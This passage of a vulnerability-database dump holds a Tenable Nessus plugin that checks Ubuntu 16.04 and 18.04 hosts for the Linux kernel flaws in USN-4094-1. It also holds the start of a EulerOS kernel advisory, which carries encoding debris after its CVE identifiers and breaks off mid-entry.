Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors\nincorrectly handle SWAPGS instructions during speculative execution. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux\nkernel did not properly check for allocation errors in some\nsituations. A local attacker could possibly use this to cause a denial\nof service (system crash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-14T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Linux kernel vulnerabilities (USN-4094-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14609", "CVE-2018-13053", "CVE-2018-14610", "CVE-2018-13096", "CVE-2018-13098", "CVE-2019-12984", "CVE-2018-13100", "CVE-2018-14615", "CVE-2019-12819", "CVE-2018-13093", "CVE-2018-13099", "CVE-2019-13272", "CVE-2018-16862", "CVE-2018-14614", "CVE-2019-12614", "CVE-2018-14617", "CVE-2018-20856", "CVE-2019-12818", "CVE-2018-14612", "CVE-2019-2024", "CVE-2018-14611", "CVE-2018-13097", "CVE-2019-3846", "CVE-2018-20169", "CVE-2018-5383", "CVE-2019-2101", "CVE-2019-10126", "CVE-2019-13233", "CVE-2019-1125", "CVE-2018-14616", "CVE-2018-20511", "CVE-2018-14613"], "modified": "2019-08-14T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-4.15", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gke", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke"], "id": "UBUNTU_USN-4094-1.NASL", "href": "https://www.tenable.com/plugins/nessus/127889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4094-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127889);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-10126\", \"CVE-2019-1125\", \"CVE-2019-12614\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\");\n script_xref(name:\"USN\", value:\"4094-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Linux kernel vulnerabilities (USN-4094-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13097,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613,\nCVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors\nincorrectly handle SWAPGS instructions during speculative execution. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux\nkernel did not properly check for allocation errors in some\nsituations. A local attacker could possibly use this to cause a denial\nof service (system crash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out of bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4094-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3846\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-4.15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2020 Canonical, Inc. / NASL script (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-13053\", \"CVE-2018-13093\", \"CVE-2018-13096\", \"CVE-2018-13097\", \"CVE-2018-13098\", \"CVE-2018-13099\", \"CVE-2018-13100\", \"CVE-2018-14609\", \"CVE-2018-14610\", \"CVE-2018-14611\", \"CVE-2018-14612\", \"CVE-2018-14613\", \"CVE-2018-14614\", \"CVE-2018-14615\", \"CVE-2018-14616\", \"CVE-2018-14617\", \"CVE-2018-16862\", \"CVE-2018-20169\", \"CVE-2018-20511\", \"CVE-2018-20856\", \"CVE-2018-5383\", \"CVE-2019-10126\", \"CVE-2019-1125\", \"CVE-2019-12614\", \"CVE-2019-12818\", \"CVE-2019-12819\", \"CVE-2019-12984\", \"CVE-2019-13233\", \"CVE-2019-13272\", \"CVE-2019-2024\", \"CVE-2019-2101\", \"CVE-2019-3846\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-4094-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1021-oracle\", pkgver:\"4.15.0-1021.23~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1040-gcp\", pkgver:\"4.15.0-1040.42~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1055-azure\", pkgver:\"4.15.0-1055.60\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-58-generic\", pkgver:\"4.15.0-58.64~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-58-generic-lpae\", pkgver:\"4.15.0-58.64~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-58-lowlatency\", pkgver:\"4.15.0-58.64~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-azure\", pkgver:\"4.15.0.1055.58\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1040.54\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1040.54\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oracle\", pkgver:\"4.15.0.1021.15\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-virtual-hwe-16.04\", pkgver:\"4.15.0.58.79\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1021-oracle\", pkgver:\"4.15.0-1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1040-gcp\", pkgver:\"4.15.0-1040.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1040-gke\", pkgver:\"4.15.0-1040.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1042-kvm\", pkgver:\"4.15.0-1042.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1043-raspi2\", pkgver:\"4.15.0-1043.46\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1050-oem\", pkgver:\"4.15.0-1050.57\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1060-snapdragon\", pkgver:\"4.15.0-1060.66\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-58-generic\", pkgver:\"4.15.0-58.64\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-58-generic-lpae\", pkgver:\"4.15.0-58.64\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-58-lowlatency\", pkgver:\"4.15.0-58.64\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1040.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic\", pkgver:\"4.15.0.58.60\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.15.0.58.60\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1040.43\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke-4.15\", pkgver:\"4.15.0.1040.43\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.15.0.1042.42\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.15.0.58.60\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.1050.54\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-oracle\", pkgver:\"4.15.0.1021.24\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.15.0.1043.41\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.15.0.1060.63\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-virtual\", pkgver:\"4.15.0.58.60\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-azure / linux-image-4.15-gcp / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-10T08:57:07", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - An information-leak vulnerability was found in the\n kernel when it truncated a file to a smaller size which\n consisted of an inline extent that was compressed. The\n data between the new file size and the old file size\n was not discarded and the number of bytes used by the\n inode were not correctly decremented, which gave the\n wrong report for callers of the stat(2) syscall. This\n wasted metadata space and allowed for the truncated\n data to be leaked, and data corruption or loss to\n occur. A caller of the clone ioctl could exploit this\n flaw by using only standard file-system operations\n without root access to read the truncated\n data.(CVE-2015-8374i1/4%0\n\n - crypto/pcrypt.c in the Linux kernel, before 4.14.13,\n mishandles freeing instances, allowing a local user\n able to access the AF_ALG-based AEAD interface\n (CONFIG_CRYPTO_USER_API_AEAD) and pcrypt\n (CONFIG_CRYPTO_PCRYPT) to cause a denial of service\n (kfree of an incorrect pointer) or possibly have\n unspecified other impact by executing a crafted\n sequence of system calls. Due to the nature of the\n flaw, privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2017-18075i1/4%0\n\n - An elevation of privilege vulnerability in the Qualcomm\n Wi-Fi driver could enable a local malicious application\n to execute arbitrary code within the context of the\n kernel. This issue is rated as High because it first\n requires compromising a privileged process. Product:\n Android. Versions: N/A. Android ID: A-32835279.\n References: QC-CR#1096945.(CVE-2017-0523i1/4%0\n\n - The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel through 4.10.14 allows local users to cause a\n denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a\n certain sequence-number value, aka a 'double fetch'\n vulnerability.(CVE-2017-8831i1/4%0\n\n - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system.(CVE-2014-7822i1/4%0\n\n - The vc4_get_bcl function in\n drivers/gpu/drm/vc4/vc4_gem.c in the VideoCore DRM\n driver in the Linux kernel before 4.9.7 does not set an\n errno value upon certain overflow detections allowing\n local users to cause a denial of service (incorrect\n pointer dereference and OOPS) via inconsistent size\n values in a VC4_SUBMIT_CL ioctl call.(CVE-2017-5577i1/4%0\n\n - In fs/ocfs2/cluster/nodemanager.c in the Linux kernel\n before 4.15, local users can cause a denial of service\n (NULL pointer dereference and BUG) because a required\n mutex is not used.(CVE-2017-18216i1/4%0\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the\n system.(CVE-2016-8655i1/4%0\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112i1/4%0\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862i1/4%0\n\n - arch/arm64/ include /asm/pgtable.h in the Linux kernel\n before 3.15-rc5-next-20140519, as used in Android\n before 2016-07-05 on Nexus 5X and 6P devices,\n mishandles execute-only pages, which allows attackers\n to gain privileges via a crafted application, aka\n Android internal bug 28557020.(CVE-2014-9803i1/4%0\n\n - A heap-buffer overflow vulnerability was found in the\n arcmsr_iop_message_xfer() function in\n 'drivers/scsi/arcmsr/arcmsr_hba.c' file in the Linux\n kernel through 4.8.2. The function does not restrict a\n certain length field, which allows local users to gain\n privileges or cause a denial of service via an\n ARCMSR_MESSAGE_WRITE_WQBUFFER control code. This can\n potentially cause kernel heap corruption and arbitrary\n kernel code execution.(CVE-2016-7425i1/4%0\n\n - An issue was discovered in the Linux kernel before\n 4.18.11. The ipddp_ioctl function in\n drivers/net/appletalk/ipddp.c allows local users to\n obtain sensitive kernel address information by\n leveraging CAP_NET_ADMIN to read the ipddp_route dev\n and next fields via an SIOCFINDIPDDPRT ioctl\n call.(CVE-2018-20511i1/4%0\n\n - A memory leak in the irda_bind function in\n net/irda/af_irda.c in the Linux kernel, through 4.16,\n allows local users to cause a denial of service due to\n a memory consumption by repeatedly binding an AF_IRDA\n socket.(CVE-2018-6554i1/4%0\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n employs a locking approach that does not consider slave\n timer instances, which allows local users to cause a\n denial of service (race condition, use-after-free, and\n system crash) via a crafted ioctl\n call.(CVE-2016-2547i1/4%0\n\n - Buffer overflow in the 